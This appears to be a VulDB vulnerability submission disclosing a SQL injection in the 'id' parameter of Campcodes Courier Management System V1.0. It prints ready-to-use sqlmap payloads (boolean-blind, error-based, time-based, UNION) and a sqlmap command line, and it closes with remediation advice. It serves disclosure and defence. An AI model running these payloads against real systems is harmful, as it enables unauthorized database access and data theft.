| Title | Campcodes Courier Management System V1.0 SQL Injection |
|---|
| Description | Campcodes Courier Management System V1.0 /edit_branch.php SQL injection
NAME OF AFFECTED PRODUCT(S)
Courier Management System
Vendor Homepage
https://www.campcodes.com/
AFFECTED AND/OR FIXED VERSION(S)
submitter
mawenjie
Vulnerable File
/edit_branch.php
VERSION(S)
V1.0
Software Link
https://www.campcodes.com/projects/php/courier management system/
https://www.campcodes.com/downloads/courier management system source code/
PROBLEM TYPE
Vulnerability Type
SQL injection
Root Cause
In courier Management System "/edit_branch.php" found a SQL injection vulnerabilities. Websites can directly use blind injection for SQL queries. Attackers can observe the application's response or other visible behaviors to determine whether the injection is successful and further probe and exploit the data in the database.
Impact
Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
DESCRIPTION
In courier Management System"/edit_branch.php" has discovered an SQL injection vulnerability. Websites can directly apply blind injection to SQL queries. Attackers obtain information about the database content by injecting conditional statements and taking advantage of Boolean condition based judgments in the application. Attackers can try different conditions and verify their correctness based on the application's response. When constructing SQL query statements, the program directly uses the ID input by the user without performing any verification or filtering on it. Therefore, arbitrary SQL queries can be executed by entering malicious ids.
<img width="1580" height="337" alt="Image" src="https://github.com/user attachments/assets/f1761dc0 bd1c 43fa 865f d09c696e1be2" />
Vulnerability details and POC
Vulnerability lonameion:
'id' parameter
Payload:
sqlmap resumed the following injection point(s) from stored session:
Parameter: 1* (URI)
Type: boolean based blind
Title: Boolean based blind Parameter replace (original value)
Payload: http://x.x.x.x:8093/index.php?page=edit_parcel&id=(SELECT (CASE WHEN (8801=8801) THEN 9 ELSE (SELECT 7661 UNION SELECT 1858) END))
Type: error based
Title: MySQL >= 5.0 OR error based WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://x.x.x.x:8093/index.php?page=edit_parcel&id=9 OR (SELECT 6471 FROM(SELECT COUNT(*),CONCAT(0x716b717871,(SELECT (ELT(6471=6471,1))),0x71787a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time based blind
Title: MySQL >= 5.0.12 OR time based blind (SLEEP)
Payload: http://x.x.x.x:8093/index.php?page=edit_parcel&id=9 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) 18 columns
Payload: http://x.x.x.x:8093/index.php?page=edit_parcel&id=9 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b717871,0x6b6e517569534a6c6c61504a6742675a77646c7a76467746755274614b4643677a6f74695946626d,0x71787a7a71),NULL,NULL
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
bash
python3 sqlmap.py u "http://x.x.x.x:8093/index.php?page=edit_parcel&id=9*" cookie PHPSESSID=1gtgbhgc1ei9ort2lvlrt4tod2 dbs
<img width="846" height="309" alt="Image" src="https://github.com/user attachments/assets/d4b2a02c 7c4e 485a 9a12 cfc18295a616" />
Suggested repair
1. Use prepared statements and parameter binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. Input validation and filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. Minimize database user permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. Regular security audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
|
|---|
| Source | ⚠️ https://github.com/XiaoJiesecqwq/CVE/issues/7 |
|---|
| User | Anonymous User |
|---|
| Submission | 07/25/2025 08:03 AM (6 months ago) |
|---|
| Moderation | 07/25/2025 10:40 AM (3 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 317599 [Campcodes Courier Management System 1.0 /edit_branch.php ID sql injection] |
|---|
| Points | 20 |
|---|